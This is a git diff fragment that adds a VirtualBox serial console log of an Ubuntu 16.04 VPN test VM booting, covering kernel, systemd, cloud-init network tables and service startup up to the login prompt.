Aggregator Device) +[ 2.158176] ACPI: Executed 1 blocks of module-level executable AML code +[ 2.171482] ACPI: Interpreter enabled +[ 2.177822] ACPI: (supports S0 S5) +[ 2.192840] ACPI: Using IOAPIC for interrupt routing +[ 2.205412] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug +[ 2.234202] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) +[ 2.235670] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] +[ 2.241894] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] +[ 2.243914] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. +[ 2.258366] PCI host bridge to bus 0000:00 +[ 2.268516] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] +[ 2.272324] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] +[ 2.307393] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] +[ 2.315822] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] +[ 2.336812] pci_bus 0000:00: root bus resource [bus 00-ff] +[ 2.346880] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] +[ 2.362624] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] +[ 2.367468] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] +[ 2.409224] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] +[ 2.438102] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI +[ 2.449781] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB +[ 2.464641] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) +[ 2.466528] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) +[ 2.468653] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) +[ 2.470553] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) +[ 2.472433] ACPI: Enabled 2 GPEs in block 00 to 07 +[ 2.481232] vgaarb: setting as boot device: PCI:0000:00:02.0 +[ 2.482558] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none +[ 2.500050] vgaarb: loaded +[ 2.500662] vgaarb: bridge control possible 0000:00:02.0 +[ 2.501906] SCSI subsystem initialized +[ 2.503321] ACPI: bus type USB registered +[ 2.504132] usbcore: registered new interface driver usbfs +[ 2.505150] usbcore: registered new interface driver hub +[ 2.506149] usbcore: registered new device driver usb +[ 2.512559] PCI: Using ACPI for IRQ routing +[ 2.524463] NetLabel: Initializing +[ 2.525407] NetLabel: domain hash size = 128 +[ 2.531647] NetLabel: protocols = UNLABELED CIPSOv4 +[ 2.533116] NetLabel: unlabeled traffic allowed by default +[ 2.545026] amd_nb: Cannot enumerate AMD northbridges +[ 2.551498] clocksource: Switched to clocksource kvm-clock +[ 2.560670] AppArmor: AppArmor Filesystem Enabled +[ 2.567174] pnp: PnP ACPI init +[ 2.568993] pnp: PnP ACPI: fund 3 devices +[ 2.72042] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns +[ 2.819537] NET: Registered protocol family 2 + +[ 2.822703] TCP established hash table entries: 8192 (order: 4, 65536 bytes) +[ 2.838964] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) +[ 2.843565] TCP: Hash bles configured (established 8192 bind 8192) +[ 3.006057] UDP hash table entris: 512 (order: 2, 16384 bytes) +[ 3.072219] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) +[ 3.074761] NET: Registered protocol family 1 +[ 3.076371] pci 0000:00:00.0: Limiting direct PCI/PCI transfers +[ 3.078595] pci 0000:00:01.0: Activating ISA DMA hang workarounds +[ 3.080984] Unpacking initramfs... + +[ 3.657824] Freeing initrd memory: 14880K +[ 3.661665] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns +[ 3.668162] platform rtc_cmos: registered platform RTC device (no PNP device found) +[ 3.673385] Scanning for low memory corruption every 60 seconds +[ 3.676080] audit: initializing netlink subsys (disabled) +[ 3.678466] audit: type=2000 audit(1611614301.334:1): initialized +[ 3.681511] Initialise system trusted keyring +[ 3.683407] HugeTLB registered 2 MB page size, pre-allocated 0 pages +[ 3.687283] zbud: loaded +[ 3.689027] VFS: Disk quotas dquot_6.6.0 +[ 3.693322] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) +[ 3.695843] squashfs: version 4.0 (2009/01/31) Phillip Lougher +[ 3.715310] fuse init (API version 7.23) +[ 3.718372] Key type big_key registered +[ 3.719305] Allocating IMA MOK and blacklist keyrings. +[ 3.741077] Key type asymmetric registered +[ 3.742116] Asymmetric key parser 'x509' registered +[ 3.743310] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) +[ 3.755570] io scheduler noop registered +[ 3.756576] io scheduler deadline registered (default) +[ 3.757794] io scheduler cfq registered +[ 3.758836] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 +[ 3.760155] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 +[ 3.768977] ACPI: AC Adapter [AC] (on-line) +[ 3.770038] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 +[ 3.773513] ACPI: Power Button [PWRF] +[ 3.774499] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 +[ 3.776363] ACPI: Sleep Button [SLPF] +[ 3.790978] ACPI: Battery Slot [BAT0] (battery present) +[ 3.793297] GHES: HEST is not enabled! +[ 3.798128] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled +[ 3.829741] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A +[ 3.862365] Linux agpgart interface v0.103 +[ 3.866286] loop: module loaded +[ 3.867462] scsi host0: ata_piix +[ 3.868284] scsi host1: ata_piix +[ 3.874986] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 +[ 3.911073] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 +[ 3.952852] libphy: Fixed MDIO Bus: probed +[ 3.969505] tun: Universal TUN/TAP device driver, 1.6 +[ 4.012299] tun: (C) 1999-2004 Max Krasnyansky +[ 4.035921] PPP generic driver version 2.4.2 +[ 4.041212] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver +[ 4.047178] ehci-pci: EHCI PCI platform driver +[ 4.051853] ehci-platform: EHCI generic platform driver +[ 4.056125] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver +[ 4.060749] ohci-pci: OHCI PCI platform driver +[ 4.063911] ohci-platform: OHCI generic platform driver +[ 4.067885] uhci_hcd: USB Universal Host Controller Interface driver +[ 4.073746] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 +[ 4.080614] serio: i8042 KBD port at 0x60,0x64 irq 1 +[ 4.084727] serio: i8042 AUX port at 0x60,0x64 irq 12 +[ 4.088150] mousedev: PS/2 mouse device common for all mice +[ 4.094250] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 +[ 4.100253] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 +[ 4.124981] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram +[ 4.129239] i2c /dev entries driver +[ 4.141398] device-mapper: uevent: version 1.0.3 +[ 4.144132] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com +[ 4.155375] ledtrig-cpu: registered to indicate activity on CPUs +[ 4.193671] NET: Registered protocol family 10 +[ 4.222679] NET: Registered protocol family 17 +[ 4.226936] Key type dns_resolver registered +[ 4.229036] registered taskstats version 1 +[ 4.232026] Loading compiled-in X.509 certificates +[ 4.236465] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' +[ 4.242804] zswap: loaded using pool lzo/zbud +[ 4.256590] Key type trusted registered +[ 4.266812] Key type encrypted registered +[ 4.268426] AppArmor: AppArmor sha1 policy hashing enabled +[ 4.270429] ima: No TPM chip found, activating TPM-bypass! +[ 4.273454] ima: Allocated hash algorithm: sha1 +[ 4.276771] evm: HMAC attrs: 0x1 +[ 4.282660] Magic number: 5:763:654 +[ 4.284316] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:17 UTC (1611614297) +[ 4.293190] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found +[ 4.297034] EDD information not available. +[ 4.309717] Freeing unused kernel memory: 1492K +[ 4.605083] Write protecting the kernel read-only data: 14336k +[ 4.612783] Freeing unused kernel memory: 1592K +[ 4.614742] Freeing unused kernel memory: 56K +Loading, please wait... +starting version 229[ 4.668933] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) + +[ 4.669532] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 4.669624] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 4.669647] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 4.669668] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 4.712423] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 4.720579] random: systemd-udevd: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 4.734759] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 4.734820] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 4.734990] random: udevadm: uninitialized urandom read (16 bytes read, 3 bits of entropy available) +[ 4.965064] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI +[ 4.966537] e1000: Copyright (c) 1999-2006 Intel Corporation. +[ 4.980547] Fusion MPT base driver 3.04.20 +[ 4.981529] Copyright (c) 1999-2008 LSI Corporation +[ 4.996189] AVX2 version of gcm_enc/dec engaged. +[ 4.998241] AES CTR mode by8 optimization enabled +[ 5.000085] Fusion MPT SPI Host driver 3.04.20 +[ 5.187487] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 +[ 5.350953] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff +[ 5.352195] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection +[ 6.064140] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:cd:22:e5 +[ 6.065578] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection +[ 6.087725] mptbase: ioc0: Initiating bringup +[ 6.090947] e1000 0000:00:03.0 enp0s3: renamed from eth0 +[ 6.127946] e1000 0000:00:08.0 enp0s8: renamed from eth1 +[ 6.179726] ioc0: LSI53C1030 A0: Capabilities={Initiator} +[ 6.357293] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 +[ 6.508204] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 6.510098] scsi target2:0:0: Beginning Domain Validation +[ 6.512097] scsi target2:0:0: Domain Validation skipping write tests +[ 6.516019] scsi target2:0:0: Ending Domain Validation +[ 6.517117] scsi target2:0:0: asynchronous +[ 6.524595] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 6.558910] scsi target2:0:1: Beginning Domain Validation +[ 6.574919] scsi target2:0:1: Domain Validation skipping write tests +[ 6.598098] scsi target2:0:1: Ending Domain Validation +[ 6.606854] scsi target2:0:1: asynchronous +[ 6.658528] sd 2:0:0:0: Attached scsi generic sg0 type 0 +[ 6.673028] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) +[ 6.724701] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) +[ 6.726466] sd 2:0:1:0: [sdb] Write Protect is off +[ 6.734983] sd 2:0:1:0: Attached scsi generic sg1 type 0 +[ 6.736727] sd 2:0:0:0: [sda] Write Protect is off +[ 6.738332] sd 2:0:1:0: [sdb] Incomplete mode parameter data +[ 6.738475] sd 2:0:0:0: [sda] Incomplete mode parameter data +[ 6.738476] sd 2:0:0:0: [sda] Assuming drive cache: write through +[ 6.762227] sd 2:0:1:0: [sdb] Assuming drive cache: write through +[ 6.778565] sda: sda1 +[ 6.783068] sd 2:0:1:0: [sdb] Attached SCSI disk +[ 6.790771] sd 2:0:0:0: [sda] Attached SCSI disk +Begin: Loading essential drivers ... [ 8.489260] md: linear personality registered for level -1 +[ 8.510500] md: multipath personality registered for level -4 +[ 8.538907] md: raid0 personality registered for level 0 +[ 8.569553] md: raid1 personality registered for level 1 +[ 8.652003] raid6: sse2x1 gen() 6929 MB/s +[ 8.719842] raid6: sse2x1 xor() 4959 MB/s +[ 8.787923] raid6: sse2x2 gen() 7147 MB/s +[ 8.864096] raid6: sse2x2 xor() 6113 MB/s +[ 8.935659] raid6: sse2x4 gen() 11041 MB/s +[ 9.022129] raid6: sse2x4 xor() 6975 MB/s +[ 9.092226] raid6: avx2x1 gen() 5771 MB/s +[ 9.170162] raid6: avx2x2 gen() 6787 MB/s +[ 9.239584] raid6: avx2x4 gen() 9183 MB/s +[ 9.241110] raid6: using algorithm sse2x4 gen() 11041 MB/s +[ 9.265002] raid6: .... xor() 6975 MB/s, rmw enabled +[ 9.276196] raid6: using avx2x2 recovery algorithm +[ 9.331475] xor: automatically using best checksumming function: +[ 9.373023] avx : 12101.000 MB/sec +[ 9.398950] async_tx: api initialized (async) +[ 9.522268] md: raid6 personality registered for level 6 +[ 9.540312] md: raid5 personality registered for level 5 +[ 9.541357] md: raid4 personality registered for level 4 +[ 9.613607] md: raid10 personality registered for level 10 +done. +Begin: Running /scripts/init-premount ... done. +Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. +Begin: Running /scripts/local-premount ... [ 9.861891] Btrfs loaded +Scanning for Btrfs filesystems +done. +Warning: fsck not present, so skipping root file system +[ 10.004405] EXT4-fs (sda1): INFO: recovery required on readonly filesystem +[ 10.104098] EXT4-fs (sda1): write access will be enabled during recovery +[ 10.227155] EXT4-fs (sda1): recovery complete +[ 10.229042] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) +done. +Begin: Running /scripts/local-bottom ... done. +Begin: Running /scripts/init-bottom ... done. +[ 10.432037] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) +[ 10.439865] systemd[1]: Detected virtualization oracle. +[ 10.445626] systemd[1]: Detected architecture x86-64. + +Welcome to Ubuntu 16.04.7 LTS! + +[ 10.464614] systemd[1]: Set hostname to . +[ 1.010610] random: nonblocking pool is initialized + +[ 11.244886] systemd[1]: Listeing on Journa Socket. +[ OK ] Listening on Journal Socket. +[ 11.676148] systemd[1]: Listening on LVM2 poll daemon socket. +[ OK ] Listening on LVM2 poll daemon socket. +[ 11.679931] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. +[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. +[ 11.69787] systemd[1]: Listening on Journal Audit Socket. +[ OK ] Listening on Journal Audit Socket. +[ 12.171978] systemd[1]: Listening on udev Kernel Socket. +[ OK ] Listening on udev Kernel Socket. +[ 12.191384] systemd[1]: Reached target User and Grup Name Looups. +[ OK ] Reached target User and Group Name Lookups. +[ 12.522628] systemd[1]: Created slice System Slice. +[ OK ] Created slice System Slice. +[ 12.547793] systemd[1]: Mounting Huge Pages File System... + Mounting Huge Pages File System... +[ 12.555425] systemd[1]: Starting Set console keymap... + Starting Set console keymap... +[ 12.584900] systemd[1]: Starting Uncomplicated firewall... + Starting Uncomplicated firewall... +[ 12.633575] systemd[1]: Mounting Debug File System... + Mounting Debug File System... +[ 12.663810] systemd[1]: Listening on Device-mapper event daemon FIFOs. +[ OK ] Listening on Device-mapper event daemon FIFOs. +[ 12.764094] systemd[1]: Starting Remount Root and Kernel File Systems... + Starting Remount Root and Kernel File S[ 12.796234] ip_tables: (C) 2000-2006 Netfilter Core Team +ystems... +[ 12.809699] EXT4-fs (sda1): re-mounted. Opts: (null) +[ 12.817859] systemd[1]: Starting Create list of required static device nodes for the current kernel... + Starting Create list of required st... nodes for the current kernel... +[ 12.915122] nf_conntrack version 0.5.0 (7935 buckets, 31740 max) +[ 12.917406] systemd[1]: Mounting POSIX Message Queue File System... + Mounting POSIX Message Queue File System... +[ 12.963948] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. +[ OK ] Listening on /dev/initctl Compatibility Named Pipe. +[ 13.000856] systemd[1]: Listening on Journal Socket (/dev/log). +[ OK ] Listening on Journal Socket (/dev/log). +[ 13.011394] systemd[1]: Listening on udev Control Socket. +[ OK ] Listening on udev Control Socket. +[ 13.024334] systemd[1]: Created slice system-serial\x2dgetty.slice. +[ OK ] Created slice system-serial\x2dgetty.slice. +[ 13.058490] systemd[1]: Starting Load Kernel Modules... + Starting Load Kernel Modules... +[ 13.148635] systemd[1]: Starting Nameserver information manager... + Starting Nameserver information manager... +[ 13.183197] systemd[1]: Started Forward Password Requests to Wall Directory Watch. +[ OK ] Started Forward Password Req[ 13.286729] ip6_tables: (C) 2000-2006 Netfilter Core Team +uests to Wall Directory Watch. +[ 13.287496] Loading iSCSI transport class v2.0-870. +[ 13.321677] systemd[1]: Listening on LVM2 metadata daemon socket. +[ OK ] Listening on LVM2 metadata daemon socket. +[ 13.614552] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... +[ 13.616164] iscsi: registered transport (tcp) + Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... +[ 13.920682] systemd[1]: Reached target System Time Synchronized. +[ OK ] Reached target System Time Synchronized. +[ 14.073687] systemd[1]: Created slice system-openvpn.slice. +[ OK ] Created slice system-openvpn.slice. +[ 14.136693] systemd[1]: Created slice User and Session Slice. +[ OK ] Created slice User and Session Slice. +[ 14.176739] systemd[1]: Reached target Slices. +[ OK ] Reached target Slices. +[ 14.197004] systemd[1]: Listening on Syslog Socket. +[ OK ] Listening on Syslog Socket. +[ 14.257898] systemd[1]: Starting Journal Service... +[ 14.288012] iscsi: registered transport (iser) + Starting Journal Service... +[ 14.352645] systemd[1]: Started Trigger resolvconf update for networkd DNS. +[ OK ] Started Trigger resolvconf update for networkd DNS. +[ 14.381496] systemd[1]: Reached target Encrypted Volumes. +[ OK ] Reached target Encrypted Volumes. +[ 14.406532] systemd[1]: Reached target Swap. +[ OK ] Reached target Swap. +[ 14.435642] systemd[1]: Mounted Debug File System. +[ OK ] Mounted Debug File System. +[ 14.476178] systemd[1]: Mounted Huge Pages File System. +[ OK ] Mounted Huge Pages File System. +[ 14.522159] systemd[1]: Mounted POSIX Message Queue File System. +[ OK ] Mounted POSIX Message Queue File System. +[ 14.548070] systemd[1]: Started Journal Service. +[ OK ] Started Journal Service. +[ OK ] Started Set console keymap. +[ OK ] Started Remount Root and Kernel File Systems. +[ OK ] Started Create list of required sta...ce nodes for the current kernel. +[ OK ] Started Load Kernel Modules. +[ OK ] Started LVM2 metadata daemon. + Mounting FUSE Control File System... + Starting Apply Kernel Variables... + Starting Create Static Device Nodes in /dev... + Starting Load/Save Random Seed... + Starting udev Coldplug all Devices... + Starting Flush Journal to Persistent Storage... +[ OK ] Mounted FUSE Control File System. +[ OK ] Started Nameserver information manager. +[ OK ] Started Apply Kernel Variables. +[ OK ] Started Load/Save Random Seed. +[ OK ] Started Flush Journal to Persistent Storage. +[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. +[ OK ] Started Create Static Device Nodes in /dev. + Starting udev Kernel Device Manager... +[ OK ] Reached target Local File Systems (Pre). +[ OK ] Reached target Local File Systems. + Starting Initial cloud-init job (pre-networking)... + Starting Set console font and keymap... + Starting Tell Plymouth To Write Out Runtime Data... + Starting LSB: AppArmor initialization... + Starting Create Volatile Files and Directories... +[ OK ] Started Tell Plymouth To Write Out Runtime Data. +[ OK ] Started udev Coldplug all Devices. +[ OK ] Started Create Volatile Files and Directories. + Starting Update UTMP about System Boot/Shutdown... +[ OK ] Started udev Kernel Device Manager. +[ OK ] Started Uncomplicated firewall. +[ OK ] Started Dispatch Password Requests to Console Directory Watch. +[ OK ] Started LSB: AppArmor initialization. +[ OK ] Started Update UTMP about System Boot/Shutdown. +[ OK ] Found device /dev/ttyS0. + Starting Load AppArmor profiles managed internally by snapd... +[ OK ] Started Set console font and keymap. +[ OK ] Started Load AppArmor profiles managed internally by snapd. +[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. +[ OK ] Created slice system-getty.slice. +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ 17.985108] cloud-init[541]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:32 +0000. Up 17.12 seconds. +[ OK ] Started Initial cloud-init job (pre-networking). +[ OK ] Reached target Network (Pre). +[ OK ] Started ifup for enp0s8. +[ OK ] Started ifup for enp0s3. + Starting Raise network interfaces... +[ OK ] Started Raise network interfaces. +[ OK ] Reached target Network. + Starting Initial cloud-init job (metadata service crawler)... +[ 19.569143] cloud-init[1173]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:34 +0000. Up 19.23 seconds. +[ 19.571605] cloud-init[1173]: ci-info: ++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++ +[ 19.577831] cloud-init[1173]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ +[ 19.583549] cloud-init[1173]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | +[ 19.640517] [cloud-init OK [1173]: ] ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+Started Initial cloud-init job (metadata service crawler). + +[ 19.641124] cloud-init[1173]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff |[ + OK ] Reached target Cloud-config availability. +[ 19.712654] [ OK ] Reached target Network is Online. +cloud-init[1173]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | +[ 19.732310] cloud-init[1173]: ci-info: | enp0s8 | True | 192.168.2.2 | 255.255.255.0 | global | 08:00:27:cd:22:e5 | +[ 19.734175] cloud-init[1173]: ci-info: | enp0s8 | True | fe80::a00:27ff:fecd:22e5/64 | . | link | 08:00:27:cd:22:e5 | +[ 19.797938] Starting iSCSI initiator daemon (iscsid)... +[ OK ] Reached target System Initialization. +cloud-init[1173]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | +[ 19.983229] cloud-init[1173]: ci-info: | lo | True | ::1/128 | . | host | . | +[ 19.983907] cloud-init[1173]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ +[ 19.984040] cloud-init[1173]: ci-info: ++++++++++++++++++++++++++++++Route IPv4 info++++++++++++++++++++++++++++++ +[ 19.984126] cloud-init[1173]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ +[ 19.984190] cloud-init[1173]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | +[ 19.984254] cloud-init[1173]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ +[ 19.984315] cloud-init[1173]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | +[ 19.984388] cloud-init[1173]: ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | +[ 19.984579] cloud-init[1173]: ci-info: | 2 | 192.168.0.0 | 192.168.2.254 | 255.255.0.0 | enp0s8 | UG | +[ 19.984640] cloud-init[1173]: ci-info: | 3 | 192.168.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | +[ 19.984697] cloud-init[1173]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ +[ 19.986002] cloud-init[1173]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ +[ 19.986447] cloud-init[1173]: ci-info: +-------+-------------+---------+-----------+-------+ +[ 19.986510] cloud-init[1173]: ci-info: | Route | Destination | Gateway | Interface | Flags | +[ 19.986578] cloud-init[1173]: ci-info: +-------+-------------+---------+-----------+-------+ +[ 19.986635] cloud-init[1173]: ci-info: | 0 | fe80::/64 | :: | enp0s8 | U | +[ 19.986694] cloud-init[1173]: ci-info: | 1 | fe80::/64 | :: | enp0s3 | U | +[ 19.986759] cloud-init[1173]: ci-info: | 4 | ff00::/8 | :: | enp0s8 | U | +[ 19.986818] cloud-init[1173]: ci-info: | 5 | ff00::/8 | :: | enp0s3 | U | +[ 19.986879] cloud-init[1173]: ci-info: +-------+-------------+---------+-----------+-------+ +[ OK ] Started Message of the Day. +[ OK ] Listening on UUID daemon activation socket. +[ OK ] Listening on PC/SC Smart Card Daemon Activation Socket. +[ OK ] Started Daily apt download activities. +[ OK ] Started Daily apt upgrade and clean activities. +[ OK ] Listening on ACPID Listen Socket. +[ OK ] Started ACPI Events Check. +[ OK ] Reached target Paths. +[ OK ] Started Daily Cleanup of Temporary Directories. +[ OK ] Reached target Timers. + Starting LXD - unix socket. +[ OK ] Listening on D-Bus System Message Bus Socket. + Starting Socket activation for snappy daemon. +[ OK ] Listening on LXD - unix socket. +[ OK ] Listening on Socket activation for snappy daemon. +[ OK ] Started iSCSI initiator daemon (iscsid). + Starting Login to default iSCSI targets... +[ OK ] Reached target Sockets. +[ OK ] Reached target Basic System. +[ OK ] Started ACPI event daemon. +[ OK ] Started Deferred execution scheduler. + Starting System Logging Service... + Starting Accounts Service... + Starting Snap Daemon... + Starting Virtualbox guest utils... +[ OK ] Started FUSE filesystem for LXC. + Starting OpenVPN service... + Starting Login Service... + Starting /etc/rc.local Compatibility... + Starting LSB: MD monitoring daemon... + Starting LXD - container startup/shutdown... + Starting OpenBSD Secure Shell server... + Starting LSB: Record successful boot for GRUB... + Starting OpenVPN connection to server... +[ OK ] Started D-Bus System Message Bus. +[ OK ] Started Regular background program processing daemon. +[ OK ] Started System Logging Service. +[ OK ] Started OpenVPN service. +[ OK ] Started /etc/rc.local Compatibility. +[ OK ] Started LXD - container startup/shutdown. +[ OK ] Started OpenVPN connection to server. +[ OK ] Started OpenBSD Secure Shell server. +[ OK ] Started Login Service. +[ OK ] Started Unattended Upgrades Shutdown. + Starting Authenticate and Authorize Users to Run Privileged Tasks... +[ OK ] Started Snap Daemon. +[ OK ] Started LSB: MD monitoring daemon. +[ OK ] Started LSB: Record successful boot for GRUB. +[ OK ] Started Login to default iSCSI targets. +[ OK ] Started Virtualbox guest utils. +[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. +[ OK ] Started Accounts Service. +[ OK ] Reached target Remote File Systems (Pre). +[ OK ] Reached target Remote File Systems. + Starting Permit User Sessions... + Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... + Starting LSB: automatic crash report generation... + Starting LSB: daemon to balance interrupts for SMP systems... + Starting Wait until snapd is fully seeded... +[ OK ] Started Permit User Sessions. +[ OK ] Started Wait until snapd is fully seeded. +[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". +[ OK ] Started LSB: automatic crash report generation. + Starting Apply the settings specified in cloud-config... + Starting Terminate Plymouth Boot Screen... + Starting Hold until boot process finishes up... +[ OK ] Started LSB: daemon to balance interrupts for SMP systems. +[ OK ] Started Terminate Plymouth Boot Screen. +[ OK ] Started Hold until boot process finishes up. + Starting Set console scheme... +[ OK ] Started Getty on tty1. +[ OK ] Started Serial Getty on ttyS0. +[ OK ] Reached target Login Prompts. +[ OK ] Reached target Multi-User System. +[ OK ] Reached target Graphical Interface. + Starting Update UTMP about System Runlevel Changes... +[ OK ] Started Set console scheme. +[ OK ] Started Update UTMP about System Runlevel Changes. +[ 25.109438] cloud-init[1452]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:39 +0000. Up 24.78 seconds. +[ OK ] Started Apply the settings specified in cloud-config. + Starting Execute cloud user/final scripts... +[ 25.926116] cloud-init[1480]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:40 +0000. Up 25.62 seconds. +[ 25.956815] cloud-init[1480]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:40 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 25.88 seconds +[ OK ] Started Execute cloud user/final scripts. +[ OK ] Reached target Cloud-init target. + +Ubuntu 16.04.7 LTS vague-vpn-server ttyS0 + +vague-vpn-server login: \ No newline at end of file diff --git a/virtual-test-environment/edgers/web-server/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/edgers/web-server/.vagrant/machines/default/virtualbox/vagrant_cwd new file mode 100644 index 0000000..d0d40e0 --- /dev/null +++ b/virtual-test-environment/edgers/web-server/.vagrant/machines/default/virtualbox/vagrant_cwd @@ -0,0 +1 